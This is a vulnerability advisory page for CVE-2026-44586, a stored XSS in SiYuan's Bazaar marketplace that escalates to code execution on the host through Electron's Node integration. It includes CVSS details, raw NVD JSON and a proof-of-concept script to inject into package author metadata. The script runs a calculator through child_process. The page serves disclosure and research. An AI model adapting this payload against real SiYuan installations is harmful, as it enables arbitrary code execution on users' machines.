Security Vulnerability Report
CVE-2026-44586 CVSS 8.3 HIGH

Published: 2026-05-14 19:16:38
Last Modified: 2026-05-14 21:22:56

Description

SiYuan is an open-source personal knowledge management system. Versions from 2.1.12 to before 3.7.0 are affected. SiYuan's Bazaar marketplace renders package author metadata from the public bazaar stage feed into HTML without escaping. In the desktop app this becomes stored XSS, and because SiYuan's Electron windows are created with nodeIntegration: true and contextIsolation: false, a successful payload can call Node.js APIs and execute code on the host. This vulnerability is fixed in 3.7.0.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available in the NVD record; the affected range below is taken from the description.

SiYuan >= 2.1.12, < 3.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2026-44586: SiYuan Stored XSS to RCE -->
<!-- Inject this into the 'Package Author Metadata' field in Bazaar -->
<script>
// Exploit Logic: Use XSS to execute system commands via Node.js
// Requires: nodeIntegration: true, contextIsolation: false (Vulnerable Config)
try {
  const { exec } = require('child_process');
  // Determine OS and execute appropriate command (e.g., open calculator)
  const cmd = process.platform === 'win32' ? 'calc.exe' : 'open -a Calculator';
  exec(cmd, (error, stdout, stderr) => {
    if (error) {
      console.error(`Execution Error: ${error.message}`);
      return;
    }
    console.log(`PoC Executed: ${stdout}`);
  });
} catch (e) {
  console.log('Node.js integration not available or context isolated.');
}
</script>
```

References

https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44586", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:37.727", "lastModified": "2026-05-14T21:22:56.313", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is an open-source personal knowledge management system. From 2.1.12 to before 3.7.0. SiYuan's Bazaar marketplace renders package author metadata from the public bazaar stage feed into HTML without escaping. In the desktop app this becomes stored XSS, and because SiYuan's Electron windows are created with nodeIntegration: true and contextIsolation: false, a successful payload can call Node.js APIs and execute code on the host. This vulnerability is fixed in 3.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9", "source": "[email protected]"}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-x6wf-w2rg-2gw9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}